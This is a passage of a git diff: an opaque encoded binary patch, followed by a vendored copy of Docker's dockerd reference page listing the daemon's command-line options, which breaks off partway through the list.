zm)!hTpdlvQdM?2+&dy09VPwjZ{v>(Sa3{rUe@d63lKP07C-R(6k?7H)v!c_M+CNjS
z9ZdBKPh}N~{z*%%daDX-q*m}KO#x{$foZm)33*pxyZ`6fdvVD;#V9?|9=4;y^whLV
zvuPJ4(vuFQrxhVG)(}~9>6hnXI5Vt22Enpnfv{bOWL)O8xQND7aM2)KG%$(&E3i@`
zbKN$Ro08d3loeZ>89SA!O$@gNvK|+})h7aHJF>>cGL?Z-d^LMW%o9!&$A)k48`7nQ
z8F)$}kXD4~>^Kz;8zL#0fvKSUlataCS;02hNZ;&DTj2hj<ikU!N|2YPkycNC!Lvn|
zs78S=*Ur=g1uv)XoOrN`csuUl!2GXiTv*UpN00%L9#SM6wu(3;W>+6$C*{7!j7(qa
zbmb|g^Tpetz3c_&Pn^}s6@3Sa6V8Y-a%CJ`=MEh69+NE@hTN61=lzZwFd<b*$`J#K
z8THC8uj9yhUuRoDKmN*G?G>{OhXn3?ONV{;+K-;FwU-x5X`g|WPDrmGKPqmJzoJ(l
z>Rx~sgAWl3ye0GA98e1Mvf#)Zx(l?2hx|O+eUY|D+m0hNd9O-+xf(uyly~at=YYc3
zqTYB$;rt97=5Q3-qDtd+yZ2q@L`>1;`-P2FMSre{Uiw{dS+v+F2*`J^wPQj?4Z0go
z5BDD^8T8*Np3^C*yYFLrwWOr0ME|u%s3;_p7|!uF7GL+ck%8|h*6x(dEo?9CD~2#}
z#cHjGuDuIM<l>AIpn~6}w^;B*hNs2PvMJ;8O$^)&xjWmr$Fzfw9Ln#o%h$C@OJ44g
zhbjzm5o!_A-h~L~8DKV`q8+FNaFvJbDmTI_jeHSzu+V+pD2+N%|Mbe6I0oLGVG+wX
z=qIa|=UVYg1kJ8M1<MFa6`0SuZX{N<Y{0Iq;927+2ezsrvFrw+I`U98F}6Cps(QgP
ztfDT)oB|-plo<zDZ!6ZYq~;gKc2XhEwFM;PSJmKZbq+_{BybKFqc+7ji$Mc>)K1+c
z!@A$bc)GF%5L{74O}=oi?skj$yKh30;irNgs7fwDp>2C5GUc>etX!!+wQO%r<d9*5
zU=Hp-K7@2-nJNQ<-}JFrR5{s}v~Df5Mt4%cbB@LVAJ*+b8$(W39jMu8$ikW5Jz;+o
zY*>2g^K9O$Yrpy9Z`Yc~%5O0m+QI_C%+s^-;;q`!37LLP8@jzSw(cuArt-i_3XLjq
z8l`2x8Qq%EvD_@@m3KyctKb#SC~G>OMQd$cn7F-(Oly*Gj+R!3i2~sXtPDtGF@=gx
zddvr-Vy#W?I|6#kDYy5ZX1F0=WH#~nUiBT7nnCe#szIXP9+BTPhBkJbRNsne4kODL
zf)q<3PkEFvMZlbLFc(l-$H?v{<*c_E=3o@>VMU{AFhkM2h9FuXGxfJ4egvz=wGYX|
zhrLEob)ZVC<f?K!P<iZ=Q)@!vdo=GYrD!t*El5Jj(&j%lWl7UgI6gi#`mWSr!_O4{
zS0LI|2Q7I3M6v{4TOuWhG;d3T%eauESfxKixeM|d&%^oOZ72>+2?u6X+Px4{1k^y?
zc9L5=Zn!OvVR4!dKt%2fR_yo;GS;ZPLkjI4+k)rL;!m2!MH%rO59d|Bhjb;0mu;Av
zlg+oNHK~{!&ky|l-_7emB{eafR4r=qhA>H6M45yb(cU@Lm@jmo3Q58lNwXsq^E;hY
z&P93R2mQJpN9bphPzt`tyIFUqG2T9d`>%U@VM&;R6~R#OZZalk>=d@ZhA5R=dYg|=
zy-R9Q+h*JN=ywyDPhV8N`656r^E*pI&b3HSjxyl|E(;_3&qnFxl)Rju^k*xWb6ndz
zlOD(=u~_2xZ4|1wYQ9w1i7D5)-D@eV#pi_Vn?UmX(cw8KG_(&nnV58)Hqg*=tSDT(
zM0?lcX{NJ??{DvbJd)(qTw%l?R83s*K56U2nWCdi`AZyOA5*P}BIdfO*cs3+wKi<~
z-G-89G*TrfCnTRr#x6A~9FeZmAIy||K4d(&Bg6YpH?~v0_mryGLtKj0sAvdE&rR8}
zR}N)K6r7edT@YE;9!sO(4u%Mm|Dd#q=+k&r=OqojFEGnjM*oYEM|JQQ%P`KI|A+jp
z8^MEuK1j1LLl)i0*#k+HSBV-NOKT%UyWw4W_i5)=MXKFwWY)tTgSUNwB%kpt`gj(T
zbEZ5HajH}HCA7LpxK=9_2`SQ?#v$CUkaNnX6NM<MsPnHM=wt24WbmJxoE=Le6+lCq
zW95#JwU|<x)1XhJO95^`-dB-5)Tczczm=yUQg&Zc`(8r{ZSb6MZp5Ai2_0h=`XcI4
z4sKsVFLEMpvSVyA&`+~9#Go&4M~!bv<+IGA-%~0hZBi>Td;}sO^8oc}!}|JHVW%*?
z6uMr~4b-0}*eCp45L?oj4ZgwK7VZ-?LEO@OIOcXmV3j;&Gzi1w`k7)D-(Hkqg7%dI
zDp_Gu*KUkvQKfXxYp?r0$-*EChsJh4ao7|2gqwv8G1ECcIIYo#a%BJ(hlF30$%{c;
zvUITuE3C6+n1(N62HPd_TKT2lm=o4Xk=-jwlg<;?yUHA^wlb<xo7}{JzPVNV_deC%
zKgvA&G)3$2xz~pIUq-XSthck3hO1_8J(>MHJQnjr;7B81jCzd&5s+Ztufthp;YM#*
ziSStyi6}0bFlgR#kRZGRiym*EEVUA`vg#RzP7F?W<{s*2Srjg-ZZSy8gCrej?$-wV
zqP@ZT(0rkKZt^bv>(1>5gw0>;c6%Hi6|yG1|2eey1m;*|-?=y3zw{#Z#@>amCkBu3
z*-?O#0mAtsNOLhnYw5_@8M{=fs8_45^~Nb?uBj-XV){g*;e>!4tLUn&c*u%v?#8v4
zryXJs?GuwLxLFIj;SQXRgI1%(H|K@V?R_=ti!|FPf5OM*5nv;+e^AZZzAQmVo6J@O
zZLF<{xwZBH=~a2~av{rlTk;7eBnT6VybI6tczEB^Q|w(48pzw9$IW+Vc%OKo)9LV<
zCmuJm=&!dDY)QnOvcPxg&8&=%EC<pjR6~HUqswdMO%XhKk~j;0&#iXK!BR9<E$mjc
z9fi#?IqGvU8tfd`qc_jE0O8FskvTxLIbURsRFQh*#e}T*3#&C7Z`Cwnl5*b4>Y&v>
zzG*9BL3AiMwAh)wMgZQ~jlmq$wP^~rGfhi3iIS|)RwKWg;eDUg3f2fj)%_D|_=NiR
z+tUOUbi7^S&&jn8tq;oN4;N!TY)j7Hz<cP?%8jm-o7a8NC9OZ~iX7Ki&}}`aCvQRd
z7~(`hl#b&2o7ZpQKCUl;PX&TzD?SohJ~rpVEnMY_tjWz$IN8Zp9{#v+;n2Hg;6w8}
zzBiu~ft}CEj<!==CarHkZOSLC4XjN$<~0Q<GjDyBJvlij4;gG+KE8nzl;e|Ii`ThE
zU`z0RHa&6O{qVdgrgGvqZ4*6UJ3qR)v9#IR?0ajQ&nL!u^f1}M7GfShVP$(<tE<32
z!;WLYS~>eA%l)h2v7^T`KF|3b*Rnl&8T@8g;mmXY3Yryg#Ma+nl@cK0YqsjITP!52
z<?}`3+i;Fg4Cy<cr@!dzmkKy@Z%2T~E8y5bZqDu?<sbedF(=0BLw;~a-e?V<PQ}#5
zWa~Tw^q!rx*Zh%S`O};`;EV0A`v&7VC*FwYoV;ieY!MTrE9O^mBA_buc<qT`-ZZ<b
zLg2IMonS?(^-_oF?U+-msi8|_rz~_cMJcl!-?>P1$o?PnhpE3zp8odo48C?^yXM#y
zHf?LUW2=4a(%TNxTa{4jWz{=!TX!#qxUC|3&P3%uM(lcfifOQ&j*HkGxXl+EVf27c
zly$n9J5)pbcdzEL`GLO!9pIvC*j=ND<ueiJz<+C(t<--;qzQ6B+ob=mhKwvNo%=s(
z$WpJ={-=hFUf=Y8YRInM?C9#g)7kUiHDslIBlpHHjotsR8nS|kshNQ%PybUx)-t>B
z>iQ!4KQ&~@%WvNozWczbA!B~r{8pF$eTUOS*8FvQ^Y1?hB@=X+LZosFtNw{S<GVLm
zK*4c^J6ygaQ%pD5IyJoJc8;u7=E~DBMI*YBd!tNBL|uEHhW`VPrxEoxOAI34t0hMU
z8Wx!+p^nc)1{pDIuPCWE=I@@aCr9gC+B&KFv<Y$3?`dsx(`=gSz}S1$jvFRzCw5gi
zPh9nz>u7j3R4(nTairqR=l3arvA1e_FCYp(^c1$RhuisI9mww7+%p!5=OC|+5#AH|
zx(B&#{Kl?MGPKVdn3~)<`MAtgS@mYOzWlRezCE6Q71KV-VC5GkHv>A_X8M!TzJLr)
z4ViiJp1hmAx2do1ap@gHpX>g<56_Sm+zH=>!a{705(ZNN<bGN+#Lf!fen%^<U($7O
zl@kU(!qbN7uNeJ1j><u?mI>M;;=>n_CYH%DZ>wgl&p9iqEXi}r1QO4S1|1wsmXXgJ
z3Mb42CdC*;1<B*>WMZw)y9Uj^$k0+Hmq9zH!+fH(V%}PYYy2r34mVywDx3oz{(Kb)
z*eeGdcAg7^xY5@CrL;Zyrr?mH@zJY3G4GD&OO#Qpk`Er|0b=)MiY8y;RNxFEl|~3}
z%c7p0d|MtjMxY_%f4qBJsg%tG5u>Lu@PQ9qg-V_d93~CcRa+XV&G!ucj~$`$U42>1
zd&0GS4*?L6Q1pEw?5q_I?_f!H-X{r~ZP16~j7PSDn@E^&SlGF@v%y6V*}@d46g#!v
zI<D08PJj<d9JY2<#KM9Gopgv-mV!xyxYNa7-DOMJRe&gKY9fzfEt`fmgL9K_4Y*iC
zfRf6o&wamEO|SC;bR0&Q<gssv8;hgXhOd-lHFs;zk(&g&l?LHkedge;(T4g5)<R7~
zB}r)QLs>UF7A%!HJEjogP&Y|J@)prxk@5MV-fY=BG{7!$7BcH3T5=%|%~2nyv6u*~
z6SH(e*a<U;K&$aD5L3qR<iQ7KMO!+1zY3lDI!pP`V>R$rCf5oj4IhyKv2k=7+B~R_
zgN@J8X*)dFg@ZDXbS-^2)4S9P0qCTi{<So|{722udIV#Mu$QL}zObfCx(Zv*T}ph;
zSr1zBqq&=%g`k<NU+)?sgK0p7)e~z0W$TSH081w#u#SA+V5}Y;cQy}OMo)TEZIMKR
zt}EZ_t>dL^Jp7<Ij-*0(7SL&D$HLIQq3BxYHXp(uATUu_X(j;3WIAC8>pVn`hJoJW
z;JOh;+eX)7Onwc9FsZ)*>s^SbRg_#Z!xFi%_~(S1v=ICVz>`IGqNd~};vOK6_RI){
zl4*{TzTCKE(vng;$7)JRE`+L3fz%-fUJ}>J?HO)U`|Co@0P^P+i1MT)@3;&C0AH;Q
z#*)L$bg~nijcI&8tf-iVGqm<!xk5&D$yk^O7nhJg6q$gQ2}I^^fm~%&2ncwe#**}}
zOT|IJA(q?WmE~GamS35F2~a0LL+Vjrd;kvN0Tbz*A{TM^QM$$pl<-v~0C!U3$md3R
z#aP$nIFI3>hxyzqYp_B96Unf)tW%-V9KK`RCFc@rmADcOJspvuBQr|M2M~bM6z|#u
zrS$?pbr%DH?vWXYJ0MFTnQEp?toF(YgEo_i#ko#g+<F@Xr(j0}4<jGxbMiWrAK`A%
zAR-hJe;p4{xZ57q3o9~QlvO|=SWj%yFDQ94e8&+nS;K{uc}f-fILf^}$oy9wpNR};
zbANUtU+5@>CPj&Kb0iAMotlFHA2wHtH%G6FAvm=Yp#oJrik0S)t}|2hUX5s4P6oi_
za4r=lzE1DK)BzKYV4+AJMZZVDT2sUvTK02QNEG1$f)F<q8dRjTXu+~GIs9vh!bbrh
zTHcqd6ea>|#s-)_K(-YF5YX2Gv<{;nO-4Sic?+zN-B@dt{@$a><T?Ui*4N~Dl$C|u
zuYbOugYYzY9pu;=IHhKH7iN&MxGX_^YC}5j&;`rdnf+Q%uNU|MXs_<+^B@(t>jMG(
z?~=J{pYryGEE(BkO!T<CPuto3RISd##BOMRCWr{LL>m<+?iBpEbG=T)*MI){=+H6}
zg`-;N`y(I~prqjC$nm`eWaVu2)WnbLwW^1c95Q~C8kruiKMH`3B<9^1vun{GjjyMf
zfV@07fIpZu_C<q{a}}jozr01;E^=wjj!r>ytd#aA>UkwF%!rzajCb<i7|Eiy&Z_HA
zp1Ba~rh){n;aVU^USQyzO<*!Xe`)s}N@=g!n;^}CB_~lvk3G)A2wczH^}Rvg;6#|R
z%){&Nzckg(Kbiq_y8U$8#N9uOXaaFke#(D}MxI9x@t|<m4O)MV>qnhd23zKxBoB&m
z9c~G>jl%6ZMY~tpxD%=_XtG2Xz}>NF-kn~+I^x&|^tsq`c-~VkQO%MM3LB3*d=K$d
z{v`=SehRf2odANTjYOCCd{rsoIQx#=m^QPw7Lf9=5K|oD(ZIbI4k5mG3p|X;@A!r<
zVV|_rs+tkd9l`n$5ejuBhADB;*Let;5b4>&Tw-MX7_XnQ3=tU7p~ZzY(9AmSPP$Ov
zki-E1vqs?(Z^?)4PXz(M^tgP{a_g18b-FAt-mV7lhi!n8PMOc2js2*7_-=hS5_o=8
zKuh&k3`$-Fhja}~gtGHtc>FOp_pk4?2Tq*0IOQplK@zUeOUIIwEB|qKGKC50=#?~#
zEE$X6DZxPeoocT^IiqnKm&`k$wD3^Bh(NCqAW=4rOjf0Gs{n~+(>}05k#?{q`H+PD
z1Ei3O06g-+1rSMaQ$-R>J+%NV8}l~hW&C61?@5BVXKq?WFHf2lf3wRF=i&XuM0HGF
z*R1rjmf=Z((s@(3Ly#y5qOiz@XS%YH<8-NMau>HR;1|l|>CdEEyfsJmh;zv5U!Az3
zmc)!rj=cd#<v|U`k&G^UDX1(;B!P0;0}EJf&8tF+$DjN}k-le?zx$v)8kN#k;bw`f
zuL~BOnsa}EbiEjL{EIPaQ$6-5M>6cnwb^M&$4w_OflDY-nY$I93tD^hPgZ0H|5_0G
z{hz&8i39S*qgx=7TKJO-yr5F_N>l>Jo^Y3AZasPUu~v(D$xgfTO`ar54FGn3fgji)
zjWGyyC{Az4JV{Se<EsLvSWi1F_V2-P0C!S)171lBws(t9#^ADak)kTdomqI7L~J!1
z5|2n2Ts`>XC(R(~Vhs_%tDqDtW0!St&KNyqGKd|AOADz}%Er??K<QhRWSsd;Tcl`<
zk)aXNSOrN4Q;|k;Ib#sAWIRMUFZxCIPNb}>3UYs3idT{1GdmRe9!(vY6cTrF%NB(q
zdes1OfAO6Acw&Q?9+qe(i@{r}AaknqbA}MxBqZOmrUK6n5MY^>6qd##1mE;bN#4M7
zWAITDc+S@Yq^14&NqU@720+eephHitr8c~!oi55u_?BA3se`gdnJ$BSZ_B+OhVb-V
z+!RHPu;7d7vA67H`VoKw64<B0X@NRN!(`nqGIwTS^6ZgZLW;4S$qGX9560~W#4a_k
zfb^iuOT>$f5;;S5C_Z^oHPf6Ug_EYA=jbq_jf^I*z}>#m3PO;vmK<3Json<S?T{nb
zM9v@}Pl;o%&H3;P#<QWjxg4@P#}f(ch0b3o)P+yd*AF2D+b&iUWe{&JWdJ$L5_wnU
zlhkrAG}7Tp2{6J)lLMD>Z{%tI_Tr}R$ow`!LSYc7VyHl~7NpV0)I1&<sC7M~DlRsK
z2#_GT1RkzHHzY9wY43n?WuB4!eW^hu?@$Iok$`fh03)#|G&vJyT^h;t=sR>}aZ0w%
z5c%_K+^ry_Z#?obG6g0oiIOu_ypp01W~N}^Xa|&~al!%K!h^*Hsm26v0?LjEe0hs>
zWrNZbV;()E8nciVc2!V0<!2c5#IOKy0F=6Zna=r@H3+GKlx3c>!vXKD5a)gu<r*XF
zf6HH=kAQ(ANe)H7zgW(-LzA|IlrDnd#<5}@tKw>e0`<t7D@B?24a|#q^XsM0-`$(z
zuA0iqGN;6LsHBlMb`-TY3?z5~2hnoicVeD+gnvAQh=xV!kQybTAtoEhsCYe_Th4^z
zlS;e1khpn5h_z3hjYH?bqm^ymW%)MV$%G?3jEVc14NMq~DX63)9BepmA()ndbV@?j
z#8#yet8!Ve9mcxQ5Q*y!R&Yca69M!_*|r1n?>wPp#Q7=>8hA&z9p%b%m{4e4Q@C7H
z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA`
z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1
zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i
zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8
za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z
z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8Cz<qPQYGZa$wzGCU^Q%K6-G;T(L!BJq@
z9jM;j)nBp2g~<77E$3A4dGVRCRXFugjBZf}Cd82!2Cg+<VuSNncTW7WIpY#`G}EMM
zSCfk^Gr$A@ju{g6Zr|qm;AYixbS}EC)6U0M%f_+=c)!xhcNRP=5AkeRkfhI&dkEq!
z@jY~yK*nR)&~X!yEWLVeI;8xeEt3iP1QXIvI0AG#xtQC;81VfJG-3=nEITIb0h+&o
z)_aa?==*&XJwC<F;AE{;^a<o`my-AJ`45g>O$07-b`OPUQ)@vc!5_bRVQV`Iapr?>
zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!<d
zesdxuS{>iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c
z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut
z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc
zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-<i@HfRcF%bkR
z_>*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HA<T
zjb89LbS={CZ3r*U&JPCoi00g9cK}WDJ`4l)R{$o*G)H|+lyLWS+Q$tK6I5F==Kh1?
zfx%XQC{C$U7t`}vQIuhbWP=)vdaqvIIm5bgojS9$eML0b%4wo8_H3oj$fEwpZDkiL
zr{Q8h7@~|kW#yHs?Y$(Tq{q_v%)vG{6oYm5HmoBgyB}0g0k~0<!~duK*2i!jt}r;}
zHi)7sLJUBnMaO{oa0bwV6wa^S0M2uA-XV{wT1pnqY3`<4@lwycEYqZVKV~ywbMnbJ
zEB#Y7fG8VOZqfMIwuhux(5R#SGy;+hD@<^g;bs~9hv?rJ`Ed>vo8DLn4aqQ1?__Hx
zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0
zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^N<YSLF|*)
z*EDQ}Va(pAEH(ns0^B_NbOOQA)dEjG2tV|lRW`22u^*h<Wnc?H00unSBb?+s*T^v?
zMSuo{bE#GX)`37mm&hf;{BsK8uQZ?<4b-21-cbI$vG4hfm(QF3K5yCeqTvYO#si2l
zp4wvP8Jw{)20r!(V(wZP+Pg4vWMS<5!g%?@gT95~kI;n7RM+46p1m*cF<#7^f4Pp^
zc{$hjvYYa9;qS{V_DlBOMK03f>Lcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t
zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@
zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)A<xgoZ|S&9!G
zd1UPJYWb`BfY=I9F~zDHunlE{L$XnKSGfCe>s1fPF0YW6v=01Z%R#$F%HI4emuKNw
zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc
z<o?~s7uM24cb^`HJQm;X9}E_C1KhkJs@uD(p&VvYxv>9T*-_=)I7mb~Qw><jF&EL$
z0uW@VFMB?X0Pm*0M|iz=9E1gln%xiIr**-9z5rnwANFkS;%#}~IXP=d2UeFpSYcs^
z2;MbcC-lK0%#!g>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj
z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M
zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq
z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF
z3RagrfI#gDx6<P<0`t89`WWs_kZVCOMxts19IeQ1KdwHii2Cui`TK1ftKOA;Ot=ih
zt-GE0!H6<ivwDBP0<)YncO=+*TL@?x0eD#J@-0IH8IkVqoiiPO{I39x2yyq;zD-(c
z_)doSPB2e!8$&oVcE85}gikZ|H1C0*5O>(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c
zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(x<NwcbG3A98xP*{{WZ-0RaF3
zLT3cjMEjJ210^sj^V&&W^;I6E0h@JIS+!M@QvF%>O@w7wKl?)vut|m${^PH7WS_0u
z3J5|@gM@{KhlKz<P>hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx
zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt
zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ
zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ
zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~;
z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW
zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc>
z5ELp~r6hppLOTZB8cxXgppLB>K<fcu1|bav5JiWXo{$XK!JXvwO~1bV`}juzk6*mv
zpaX0<A%p-s4Dy0<@N_nW2tW)XgiQ|0LI@7Txz?EqojIXF|5;9q;GYu!lEl;!0+jVZ
zJ208IV1oie=tM^h>;Qxb8S*FJZTaP><BmMix1WtAP|$)26*>V#bSO{&-ylr=AOHXm
zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWE<zy~WpP-6)iw2;9I1w9$%MdEPd
zm5n#{=;xn+2D;OaeEx!n5x3m5*iD8Sf<#=aG>Xx6hEPh<l7v9YCzCh|>glJThMEbX
zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E
zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV
zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8
zMu@QSDl<fe%TeaJ^8+|VRy(o9FvrXr#$1hT2nqtv%3RBcpjS|N00Ck1AxcDC6wmN<
zD)Z7z&rDQs%%zOT0+^=C-8&i}7>m@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v(
z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9
zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol
zp@Is8n4pf(<aDUP5I`gVL81w?N1}_$8wmh8j6pC00oswoKo3s50D#udEI>g30t8rq
zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F
zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&<OA|WA8NI$Azur7mOz{1Re
zzQ%|I01*1Y!88Y=Y&hWpC=#0d6vB=deas0(NZAESNF4z9Ac9!T;yjK308PQehs+rU
z1Y8s~LR<hrM)=SId{_t=7NP(EI86p#{|KQq9)cDtXi6TJ0x-$_&~<95VEoo`3n453
zK}v*)OlV>g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y
z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4
zh5>*Nm2nVf90UaR2E;??q7b23<se$wO^g5_mUwi6G^FOoSh#K*94rJ8P4GlNCUQE6
zz=1KAflO9>AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl((
zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT
zl7T@OMg)n<Cg%zf(ktQM12VvcNS#0c;^YrYFnHfBnhJxbMl}`+5t>2{Kp^_*qCv4B
zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d
ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`<j0S7X)1hpKX1{t7$Ri7jP
zIvL?}2iSoTjuIjxsHFfJFllE#aDWk*Km&WLUO^~Oi;aNe051sX^gsduUPyx*3NgU}
zS}+3!4Pq$*$QevX(Ae@?|B?v;*x_9;Wl|>?jS!d`LYW%JimFlPG>BaXVe$)KLwM12
z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO
zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc<Jplu>`LU9N
zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-&
zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr
z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj<u|3P3v0Q`qsGKM<4(I
EJItD)iU0rr

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md b/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
new file mode 100644
index 0000000000..24ac77611d
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
@@ -0,0 +1,1364 @@
+---
+title: "dockerd"
+aliases: ["/engine/reference/commandline/daemon/"]
+description: "The daemon command description and usage"
+keywords: "container, daemon, runtime"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# daemon
+
+```markdown
+Usage: dockerd [OPTIONS]
+
+A self-sufficient runtime for containers.
+
+Options:
+      --add-runtime value                     Register an additional OCI compatible runtime (default [])
+      --api-cors-header string                Set CORS headers in the Engine API
+      --authorization-plugin value            Authorization plugins to load (default [])
+      --bip string                            Specify network bridge IP
+  -b, --bridge string                         Attach containers to a network bridge
+      --cgroup-parent string                  Set parent cgroup for all containers
+      --cluster-advertise string              Address or interface name to advertise
+      --cluster-store string                  URL of the distributed storage backend
+      --cluster-store-opt value               Set cluster store options (default map[])
+      --config-file string                    Daemon configuration file (default "/etc/docker/daemon.json")
+      --containerd string                     Path to containerd socket
+  -D, --debug                                 Enable debug mode
+      --default-gateway value                 Container default gateway IPv4 address
+      --default-gateway-v6 value              Container default gateway IPv6 address
+      --default-runtime string                Default OCI runtime for containers (default "runc")
+      --default-ulimit value                  Default ulimits for containers (default [])
+      --disable-legacy-registry               Disable contacting legacy registries
+      --dns value                             DNS server to use (default [])
+      --dns-opt value                         DNS options to use (default [])
+      --dns-search value                      DNS search domains to use (default [])
+      --exec-opt value                        Runtime execution options (default [])
+      --exec-root string                      Root directory for execution state files (default "/var/run/docker")
+      --experimental                          Enable experimental features
+      --fixed-cidr string                     IPv4 subnet for fixed IPs
+      --fixed-cidr-v6 string                  IPv6 subnet for fixed IPs
+  -g, --graph string                          Root of the Docker runtime (default "/var/lib/docker")
+  -G, --group string                          Group for the unix socket (default "docker")
+      --help                                  Print usage
+  -H, --host value                            Daemon socket(s) to connect to (default [])
+      --icc                                   Enable inter-container communication (default true)
+      --init                                  Run an init in the container to forward signals and reap processes
+      --init-path string                      Path to the docker-init binary
+      --insecure-registry value               Enable insecure registry communication (default [])
+      --ip value                              Default IP when binding container ports (default 0.0.0.0)
+      --ip-forward                            Enable net.ipv4.ip_forward (default true)
+      --ip-masq                               Enable IP masquerading (default true)
+      --iptables                              Enable addition of iptables rules (default true)
+      --ipv6                                  Enable IPv6 networking
+      --label value                           Set key=value labels to the daemon (default [])
+      --live-restore                          Enable live restore of docker when containers are still running (Linux only)
+      --log-driver string                     Default driver for container logs (default "json-file")
+  -l, --log-level string                      Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info")
+      --log-opt value                         Default log driver options for containers (default map[])
+      --max-concurrent-downloads int          Set the max concurrent downloads for each pull (default 3)
+      --max-concurrent-uploads int            Set the max concurrent uploads for each push (default 5)
+      --metrics-addr string                   Set address and port to serve the metrics api (default "")
+      --mtu int                               Set the containers network MTU
+      --oom-score-adjust int                  Set the oom_score_adj for the daemon (default -500)
